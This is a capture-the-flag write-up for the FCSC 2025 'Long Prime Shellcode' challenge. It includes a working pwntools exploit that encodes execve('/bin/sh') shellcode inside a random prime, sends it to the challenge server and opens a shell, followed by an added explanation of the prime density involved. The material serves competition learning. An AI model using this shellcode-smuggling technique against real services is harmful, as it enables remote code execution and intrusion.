FCSC 2025 - Long Prime Shellcode
Category : PWN
Phreaks 2600
You can find this writeup on the Phreaks 2600 website
Context
This challenge was a service that accepts a 64-bit x86 shellcode encoded as a big prime number.
Lazy solving
Because I was too lazy, I used brute force to solve the challenge:
- Generate an x86 64-bit shellcode
- Generate a big odd random number shifted by 800 bits to the left
- Add the big number and the shellcode and cross fingers that it is a prime number. If not, restart the operations.
Here is the visual explanation of the final big prime number:
[A][X...X][E]
A : Shellcode
X : 800 random bits
E : Last digit, which is always odd (because every prime greater than 2 is odd)
Exploit
Here is the exploit:

import secrets
from sympy import isprime
from pwn import *

def generate_shellcode(bits):
    # execve("/bin/sh") shellcode for amd64, assembled by pwntools
    shellcode = asm(shellcraft.amd64.execve("/bin/sh"), arch="amd64")
    while True:
        # Random padding of `bits` bits, top bit and low bit set (always odd)
        n = secrets.randbits(bits) | (1 << (bits - 1)) | 1
        # Shellcode in the high bits, random padding in the low bits
        z = (int.from_bytes(shellcode, "big") << bits) + n
        if isprime(z):
            return z

p = remote("chall.fcsc.fr", 2100)
p.send(str(generate_shellcode(800)).encode())
p.interactive()

Notes
I get the flag in less than a minute. Very fast and effective.
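
Why the search finishes so quickly, as an added example that is not part of the original writeup: by the prime number theorem roughly 2/ln(N) of the odd numbers near N are prime, so a fixed byte prefix followed by 800 random bits reaches a prime after a few hundred tries. A primality check on input therefore does not constrain its leading bytes. The helper names, the constructed placeholder `PREFIX` (not real shellcode) and the big-endian integer-to-bytes conversion are assumptions.

```python
import math
import secrets

def is_probable_prime(n, rounds=24):
    """Miller-Rabin probabilistic primality test."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, s = n - 1, 0
    while d % 2 == 0:
        d, s = d // 2, s + 1
    for _ in range(rounds):
        a = secrets.randbelow(n - 3) + 2      # random witness in [2, n-2]
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False                      # witness proves n composite
    return True

def prime_with_prefix(prefix: bytes, pad_bits: int = 800):
    """Return (prime, attempts) where the prime's top bytes equal `prefix`."""
    high = int.from_bytes(prefix, "big") << pad_bits   # [A] followed by zeros
    attempts = 0
    while True:
        attempts += 1
        low = secrets.randbits(pad_bits) | 1           # [X...X][E], E odd
        if is_probable_prime(high | low):
            return high | low, attempts

def expected_attempts(prefix_len: int, pad_bits: int = 800) -> float:
    """Prime number theorem: about 2/ln(N) of odd numbers near N are prime."""
    total_bits = 8 * prefix_len + pad_bits
    return total_bits * math.log(2) / 2

# Constructed placeholder bytes standing in for [A]; not real shellcode.
PREFIX = bytes.fromhex("a1b2c3d4e5f60718")

if __name__ == "__main__":
    p, tries = prime_with_prefix(PREFIX)
    raw = p.to_bytes((p.bit_length() + 7) // 8, "big")
    print(f"found after {tries} tries, expected about {expected_attempts(len(PREFIX)):.0f}")
    print("prefix preserved:", raw.startswith(PREFIX))
```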